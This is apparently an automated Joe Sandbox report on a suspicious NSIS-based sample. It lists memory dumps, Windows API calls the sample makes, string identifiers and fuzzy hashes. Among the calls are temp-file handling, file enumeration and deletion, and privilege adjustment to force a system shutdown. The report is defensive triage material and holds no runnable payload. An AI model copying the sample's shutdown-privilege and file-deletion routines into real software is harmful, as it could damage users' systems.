                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3285110613.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_110000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6e3a7dd19e47d51fd143caafdf6fce2d9bf5fd3caf1041e3ece393cb398aa8fa
                                                                                                              • Instruction ID: 0ef8b7546c9443f09911d6b02b06b8804f39dd27bfd5328945022468437b7b8d
                                                                                                              • Opcode Fuzzy Hash: 6e3a7dd19e47d51fd143caafdf6fce2d9bf5fd3caf1041e3ece393cb398aa8fa
                                                                                                              • Instruction Fuzzy Hash: 47C01239614201ABD701AA70D940B4FFFD2ABC4740F008C18A04C53160D134DA128A02
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3310703083.0000000038ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38ED0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_38ed0000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3a11addb8de37e1623466f2ef41210795f6471f9b506a46961d6a88927519570
                                                                                                              • Instruction ID: 7b50d7c78144b8c3ca147a68520255f7bb7568213a1ca69af315324c152c8e6c
                                                                                                              • Opcode Fuzzy Hash: 3a11addb8de37e1623466f2ef41210795f6471f9b506a46961d6a88927519570
                                                                                                              • Instruction Fuzzy Hash: EEC08C302AC6088FE2009A1DC984A5133ACEF85B04F0018E0F1048B735CA22FC088604
                                                                                                              APIs
                                                                                                              • SetErrorMode.KERNEL32 ref: 004032C2
                                                                                                              • GetVersion.KERNEL32 ref: 004032C8
                                                                                                              • #17.COMCTL32(00000007,00000009,SETUPAPI,USERENV,UXTHEME), ref: 00403318
                                                                                                              • OleInitialize.OLE32(00000000), ref: 0040331F
                                                                                                              • SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 0040333B
                                                                                                              • GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 00403350
                                                                                                              • GetModuleHandleW.KERNEL32(00000000,0043F000,00000000), ref: 00403363
                                                                                                              • CharNextW.USER32(00000000,0043F000,00000020), ref: 0040338A
                                                                                                                • Part of subcall function 0040642B: GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
                                                                                                                • Part of subcall function 0040642B: GetProcAddress.KERNEL32(00000000,?), ref: 00406458
                                                                                                              • GetTempPathW.KERNEL32(00000400,00441800), ref: 004034C5
                                                                                                              • GetWindowsDirectoryW.KERNEL32(00441800,000003FB), ref: 004034D6
                                                                                                              • lstrcatW.KERNEL32(00441800,\Temp), ref: 004034E2
                                                                                                              • GetTempPathW.KERNEL32(000003FC,00441800,00441800,\Temp), ref: 004034F6
                                                                                                              • lstrcatW.KERNEL32(00441800,Low), ref: 004034FE
                                                                                                              • SetEnvironmentVariableW.KERNEL32(TEMP,00441800,00441800,Low), ref: 0040350F
                                                                                                              • SetEnvironmentVariableW.KERNEL32(TMP,00441800), ref: 00403517
                                                                                                              • DeleteFileW.KERNEL32(00441000), ref: 0040352B
                                                                                                                • Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062
                                                                                                              • OleUninitialize.OLE32(?), ref: 004035F6
                                                                                                              • ExitProcess.KERNEL32 ref: 00403618
                                                                                                              • lstrcatW.KERNEL32(00441800,~nsu,0043F000,00000000,?), ref: 0040362B
                                                                                                              • lstrcatW.KERNEL32(00441800,0040A26C,00441800,~nsu,0043F000,00000000,?), ref: 0040363A
                                                                                                              • lstrcatW.KERNEL32(00441800,.tmp,00441800,~nsu,0043F000,00000000,?), ref: 00403645
                                                                                                              • lstrcmpiW.KERNEL32(00441800,00440800,00441800,.tmp,00441800,~nsu,0043F000,00000000,?), ref: 00403651
                                                                                                              • SetCurrentDirectoryW.KERNEL32(00441800,00441800), ref: 0040366D
                                                                                                              • DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00435000,?), ref: 004036C7
                                                                                                              • CopyFileW.KERNEL32(00442800,0042AA28,00000001), ref: 004036DB
                                                                                                              • CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000), ref: 00403708
                                                                                                              • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403737
                                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 0040373E
                                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403753
                                                                                                              • AdjustTokenPrivileges.ADVAPI32 ref: 00403776
                                                                                                              • ExitWindowsEx.USER32(00000002,80040002), ref: 0040379B
                                                                                                              • ExitProcess.KERNEL32 ref: 004037BE
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3285321595.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3285304936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285341884.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285359778.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285386259.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpyn
                                                                                                              • String ID: .tmp$Error launching installer$Low$NSIS Error$SETUPAPI$SeShutdownPrivilege$TEMP$TMP$USERENV$UXTHEME$\Temp$~nsu
                                                                                                              • API String ID: 3586999533-3972089011
                                                                                                              • Opcode ID: b76b61fe59c96232ee09de7477e4ba1d3ea630d83fddd21a04d7d9ff3721efeb
                                                                                                              • Instruction ID: 84ba5929d45b1413e1818888a5ef7abe037fd34abcf77f3f73da9f6cce4da4cf
                                                                                                              • Opcode Fuzzy Hash: b76b61fe59c96232ee09de7477e4ba1d3ea630d83fddd21a04d7d9ff3721efeb
                                                                                                              • Instruction Fuzzy Hash: 35D1F870500300ABD310BF659D49A3B3AADEB8174AF51443FF581B62E2DB7D8945876E
                                                                                                              APIs
                                                                                                              • GetDlgItem.USER32(?,000003F9), ref: 00404B48
                                                                                                              • GetDlgItem.USER32(?,00000408), ref: 00404B53
                                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B9D
                                                                                                              • LoadBitmapW.USER32(0000006E), ref: 00404BB0
                                                                                                              • SetWindowLongW.USER32(?,000000FC,00405128), ref: 00404BC9
                                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BDD
                                                                                                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BEF
                                                                                                              • SendMessageW.USER32(?,00001109,00000002), ref: 00404C05
                                                                                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C11
                                                                                                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C23
                                                                                                              • DeleteObject.GDI32(00000000), ref: 00404C26
                                                                                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C51
                                                                                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C5D
                                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CF3
                                                                                                              • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D1E
                                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D32
                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00404D61
                                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D6F
                                                                                                              • ShowWindow.USER32(?,00000005), ref: 00404D80
                                                                                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E7D
                                                                                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EE2
                                                                                                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404EF7
                                                                                                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404F1B
                                                                                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F3B
                                                                                                              • ImageList_Destroy.COMCTL32(?), ref: 00404F50
                                                                                                              • GlobalFree.KERNEL32(?), ref: 00404F60
                                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FD9
                                                                                                              • SendMessageW.USER32(?,00001102,?,?), ref: 00405082
                                                                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405091
                                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 004050B1
                                                                                                              • ShowWindow.USER32(?,00000000), ref: 004050FF
                                                                                                              • GetDlgItem.USER32(?,000003FE), ref: 0040510A
                                                                                                              • ShowWindow.USER32(00000000), ref: 00405111
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3285321595.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3285304936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285341884.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285359778.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285386259.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                              • String ID: $M$N
                                                                                                              • API String ID: 1638840714-813528018
                                                                                                              • Opcode ID: 4cbb5e0717cdc748ffed23d4a8be9d35437acf42fd757cc9a3c8c6ab170577e7
                                                                                                              • Instruction ID: 943130f726a074c81f80d4b2a4465e83a32f395645510c1f9de1d6fa8cfacfb7
                                                                                                              • Opcode Fuzzy Hash: 4cbb5e0717cdc748ffed23d4a8be9d35437acf42fd757cc9a3c8c6ab170577e7
                                                                                                              • Instruction Fuzzy Hash: 0A028FB0900209EFDB209F64DD85AAE7BB5FB84314F14857AF610BA2E1C7789D42DF58
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3310703083.0000000038ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38ED0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_38ed0000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: "$0o@p$Lj@p$Lj@p$Lj@p$Lj@p$Lj@p$Lj@p$Lj@p$Lj@p$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q
                                                                                                              • API String ID: 0-1947560563
                                                                                                              • Opcode ID: a77cbcf15b104b1c57741ca7da6cfb117e55118ffd2a3b58ea2e86b08a71aab2
                                                                                                              • Instruction ID: dd957449bc5f9e493e6780d98f44d05ff4b2426804dc2c408e0e490c597e71f9
                                                                                                              • Opcode Fuzzy Hash: a77cbcf15b104b1c57741ca7da6cfb117e55118ffd2a3b58ea2e86b08a71aab2
                                                                                                              • Instruction Fuzzy Hash: 6F329E74E41218CFDB54CF69C994B9DBBB2BF89304F1080A9D809AB361DB759E89CF14
                                                                                                              APIs
                                                                                                              • DeleteFileW.KERNEL32(?,?,75923420,00441800,0043F000), ref: 0040586F
                                                                                                              • lstrcatW.KERNEL32(0042F270,\*.*,0042F270,?,?,75923420,00441800,0043F000), ref: 004058B7
                                                                                                              • lstrcatW.KERNEL32(?,0040A014,?,0042F270,?,?,75923420,00441800,0043F000), ref: 004058DA
                                                                                                              • lstrlenW.KERNEL32(?,?,0040A014,?,0042F270,?,?,75923420,00441800,0043F000), ref: 004058E0
                                                                                                              • FindFirstFileW.KERNEL32(0042F270,?,?,?,0040A014,?,0042F270,?,?,75923420,00441800,0043F000), ref: 004058F0
                                                                                                              • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,0040A300,0000002E), ref: 00405990
                                                                                                              • FindClose.KERNEL32(00000000), ref: 0040599F
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3285321595.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3285304936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285341884.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285359778.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285386259.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                              • String ID: \*.*
                                                                                                              • API String ID: 2035342205-1173974218
                                                                                                              • Opcode ID: 758a93316bd333329ed0a6d4f3bd80d9b1b6158e35c963d2e10a1872ebc8ab6d
                                                                                                              • Instruction ID: 3422579b2d55acfa562187ab3f611d485c5dde76635b84dd87a68d04928cc13f
                                                                                                              • Opcode Fuzzy Hash: 758a93316bd333329ed0a6d4f3bd80d9b1b6158e35c963d2e10a1872ebc8ab6d
                                                                                                              • Instruction Fuzzy Hash: 4541F270900A04EADF21AB618C89BBF7678EF41724F14823BF801B51D1D77C49859E6E
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3310703083.0000000038ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38ED0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_38ed0000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: "$0o@p$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q
                                                                                                              • API String ID: 0-455001714
                                                                                                              • Opcode ID: e1ff92952e4558ad97fe4a4d7d42b5cb15eff68f2b96548d6a825d728725bf6f
                                                                                                              • Instruction ID: 550fdf78e433bd4ba7c6beb268d1cff6348b58be145172e35fc4e3c004758045
                                                                                                              • Opcode Fuzzy Hash: e1ff92952e4558ad97fe4a4d7d42b5cb15eff68f2b96548d6a825d728725bf6f
                                                                                                              • Instruction Fuzzy Hash: 3002A0B4E012188FDB58CF69C994B9DBBF2BF89304F1081A9D809A7365DB359E85CF10
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3310703083.0000000038ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38ED0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_38ed0000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: "$0o@p$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q
                                                                                                              • API String ID: 0-455001714
                                                                                                              • Opcode ID: 375d4238728225723b326bdae2e5cb7f26a9721ea1e6d2c80c48f65fb2fd409a
                                                                                                              • Instruction ID: ad5abae7f5f7d981d4c5c4923610503f5b784141c9739fc6209e29a5ac99ef05
                                                                                                              • Opcode Fuzzy Hash: 375d4238728225723b326bdae2e5cb7f26a9721ea1e6d2c80c48f65fb2fd409a
                                                                                                              • Instruction Fuzzy Hash: 8402A0B4E012188FDB58CF69C994B9DBBF2BF89304F1081A9D809A7365DB759E85CF10
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3310703083.0000000038ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38ED0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_38ed0000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: .5uq$B98
                                                                                                              • API String ID: 0-529439237
                                                                                                              • Opcode ID: 67ea1be22fc8ed7f6ebbc4316e0c9a9387fd723579dcd63fa9deb66a4f2f15f5
                                                                                                              • Instruction ID: b2c5a3299b41cb237b938083fe2b785f008af0a711dc085b0d609c33cd7453c3
                                                                                                              • Opcode Fuzzy Hash: 67ea1be22fc8ed7f6ebbc4316e0c9a9387fd723579dcd63fa9deb66a4f2f15f5
                                                                                                              • Instruction Fuzzy Hash: D5628A74E01228CFDB64DF65C880B9DBBB2BF89301F1085E9D449AB265DB359E86CF50
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3310703083.0000000038ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38ED0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_38ed0000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: B98
                                                                                                              • API String ID: 0-2126999036
                                                                                                              • Opcode ID: 5b7d1cd0511b7674516854711d4ba651118f88ba6f2c47a87c203f445225aeb3
                                                                                                              • Instruction ID: 5c3e642a4395f584a556ed4bba120009a0e95ce971d0c48b5e77f52c83cd509f
                                                                                                              • Opcode Fuzzy Hash: 5b7d1cd0511b7674516854711d4ba651118f88ba6f2c47a87c203f445225aeb3
                                                                                                              • Instruction Fuzzy Hash: A3A19D74A01228CFDB64DF64C894B99BBB2BF4A301F1085EAD44DA7360DB359E85CF41
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3310703083.0000000038ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38ED0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_38ed0000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: B98
                                                                                                              • API String ID: 0-2126999036
                                                                                                              • Opcode ID: f4bf4e65d178facd2282c3bd027973cd705fd2b7f7b7e7b655399a08f6aae863
                                                                                                              • Instruction ID: 4c8545224b270bef6cb44e2228302f2891dbdeb8c7506438e23892ce53ea405d
                                                                                                              • Opcode Fuzzy Hash: f4bf4e65d178facd2282c3bd027973cd705fd2b7f7b7e7b655399a08f6aae863
                                                                                                              • Instruction Fuzzy Hash: 22518074A01228CFCB64DF64C894B9AB7B2BF4A305F5089E9D44EA7350DB359E86CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3310253673.0000000038380000.00000040.00000800.00020000.00000000.sdmp, Offset: 38380000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_38380000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c268c8de42c2c5f2ef30a8693363cc6fa4bff8d59cbcf44ecbae598acfcd869b
                                                                                                              • Instruction ID: c9636707eedf9cd175a892d556bc0f6908623a650b3c51a03500aae40352f209
                                                                                                              • Opcode Fuzzy Hash: c268c8de42c2c5f2ef30a8693363cc6fa4bff8d59cbcf44ecbae598acfcd869b
                                                                                                              • Instruction Fuzzy Hash: E8C1B174E01218CFDB54DFA5C995B9DBBB2BF89300F2080A9D809AB365DB359E85CF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3310253673.0000000038380000.00000040.00000800.00020000.00000000.sdmp, Offset: 38380000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_38380000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 560a203a8324979bce84cf91d9f3816666de166dc0815e3e2cbc4a216b3c86c6
                                                                                                              • Instruction ID: f670066251e415b6a9ef14d0fd8a56c8a199255b4b1d2d145d625f6ef3f8691b
                                                                                                              • Opcode Fuzzy Hash: 560a203a8324979bce84cf91d9f3816666de166dc0815e3e2cbc4a216b3c86c6
                                                                                                              • Instruction Fuzzy Hash: 78C1CF74E01218CFDB54DFA5C994B9DBBB2BF89300F2081A9D809AB365DB359E85CF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3310253673.0000000038380000.00000040.00000800.00020000.00000000.sdmp, Offset: 38380000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_38380000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 320c6bb72ef448708a8c09905bcd762706b37c755244eecfd733dd13c3c2ed1f
                                                                                                              • Instruction ID: 7dee34b86002843bb070eede6457bed47a80623061779b5b5dd02e9288413c91
                                                                                                              • Opcode Fuzzy Hash: 320c6bb72ef448708a8c09905bcd762706b37c755244eecfd733dd13c3c2ed1f
                                                                                                              • Instruction Fuzzy Hash: C2C1BF74E01218CFDB54DFA5C994B9DBBB2BF89300F6080A9D809AB365DB359E85CF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3310253673.0000000038380000.00000040.00000800.00020000.00000000.sdmp, Offset: 38380000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_38380000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7fcf9c215e7dc5689c4f257c8bbb00a1a795b61f8bdf81dd558f86cf99b3b167
                                                                                                              • Instruction ID: b5f686ad21dcc77eee7d070267e4ca2980317cb490fbcd98346428eae1eb8c05
                                                                                                              • Opcode Fuzzy Hash: 7fcf9c215e7dc5689c4f257c8bbb00a1a795b61f8bdf81dd558f86cf99b3b167
                                                                                                              • Instruction Fuzzy Hash: B1C1B074E01218CFDB54DFA5C994B9DBBB2BF89300F2081A9D809AB365DB359E85CF11
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3310253673.0000000038380000.00000040.00000800.00020000.00000000.sdmp, Offset: 38380000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_38380000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ffcb5ad7e8c89506d319ec6137613feec2b9fd7174bb65c796a6d677cf1380db
                                                                                                              • Instruction ID: c6b2c045485f9751f324c880a58cf9d8b77b4d67ced9dc28af661841ecd0a6df
                                                                                                              • Opcode Fuzzy Hash: ffcb5ad7e8c89506d319ec6137613feec2b9fd7174bb65c796a6d677cf1380db
                                                                                                              • Instruction Fuzzy Hash: 08C1B174E01218CFDB54DFA5C994B9DBBB2BF89300F2081A9D809AB365DB359E85CF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3310253673.0000000038380000.00000040.00000800.00020000.00000000.sdmp, Offset: 38380000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_38380000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 46edc7295dd3135edddb7146deb730e1cbad184267ed7617aba82a5fe7a4b87d
                                                                                                              • Instruction ID: 117f5765e6643fc4582ba79036868f37b53b3588e9dd42818f3545edc01b539c
                                                                                                              • Opcode Fuzzy Hash: 46edc7295dd3135edddb7146deb730e1cbad184267ed7617aba82a5fe7a4b87d
                                                                                                              • Instruction Fuzzy Hash: CBC1A074E01218CFDB54DFA5C994B9DBBB2BF89300F2081A9D809AB365DB359E85CF11
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3310703083.0000000038ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38ED0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_38ed0000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c0af1c64c466eeaba11398bf42fcebca4d791926ef56fc531ef3a7ab33ce70db
                                                                                                              • Instruction ID: 4bf03053f520dc436d64ce72de0460c9b118da0d8f8e5fe46357a96795a99bae
                                                                                                              • Opcode Fuzzy Hash: c0af1c64c466eeaba11398bf42fcebca4d791926ef56fc531ef3a7ab33ce70db
                                                                                                              • Instruction Fuzzy Hash: B5C1B274E01218CFDB54DFA5C994B9DBBB2BF89300F2081A9D809AB365DB359E85CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3310703083.0000000038ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38ED0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_38ed0000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: fbef09de3c472dcdfcc50d334648e8595ae31b5a47c518695f763cde3a1eebb3
                                                                                                              • Instruction ID: 6d30b1cf56be79bac585d181a4f979d116675e14047fae4e5faee10c1e39b6e4
                                                                                                              • Opcode Fuzzy Hash: fbef09de3c472dcdfcc50d334648e8595ae31b5a47c518695f763cde3a1eebb3
                                                                                                              • Instruction Fuzzy Hash: 48C1A474E01218CFDB54DFA5C995B9DBBB2BF89300F1081A9D409AB355DB359E86CF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3310703083.0000000038ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38ED0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_38ed0000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 657cf1a69dacc60b234621c561be858fd0b60284e56522a2b282c4c56c93fce8
                                                                                                              • Instruction ID: b34e52d69dddd52dd1d32b62bc4ed02a7b9dfa50a550e84c8694c5f125cbc0fc
                                                                                                              • Opcode Fuzzy Hash: 657cf1a69dacc60b234621c561be858fd0b60284e56522a2b282c4c56c93fce8
                                                                                                              • Instruction Fuzzy Hash: C7C1C375E01218CFDB54DFA5C994B9DBBB2BF89304F1081A9D809AB365DB349E86CF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3310703083.0000000038ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38ED0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_38ed0000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d04bc00b16ca901f7b1e9036eaee767866a3c8e1d4733f73e11d0b2b51cf3c59
                                                                                                              • Instruction ID: 7151b1213b52d3fee4a536f99b97d9bbedf5c44e7ccadcb8d6a5623ee7cde9fc
                                                                                                              • Opcode Fuzzy Hash: d04bc00b16ca901f7b1e9036eaee767866a3c8e1d4733f73e11d0b2b51cf3c59
                                                                                                              • Instruction Fuzzy Hash: F3C1A374E01218CFDB54DFA5C994B9DBBB2BF89300F2081A9D409AB365DB359E86CF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3310703083.0000000038ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38ED0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_38ed0000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9b9f2a64ab588615e93dd6da0f3c65676fdbb4719f569881d2ac84a1ed4ca22b
                                                                                                              • Instruction ID: e3ac70d7ff76125087004b4dbbc9d725dda3a722f979a0356fc7460e42bfae53
                                                                                                              • Opcode Fuzzy Hash: 9b9f2a64ab588615e93dd6da0f3c65676fdbb4719f569881d2ac84a1ed4ca22b
                                                                                                              • Instruction Fuzzy Hash: 97C1A274E01218CFDB54DFA5C994B9DBBB2BF89300F2081A9D809AB355DB359E86CF10
                                                                                                              Memory Dump Source
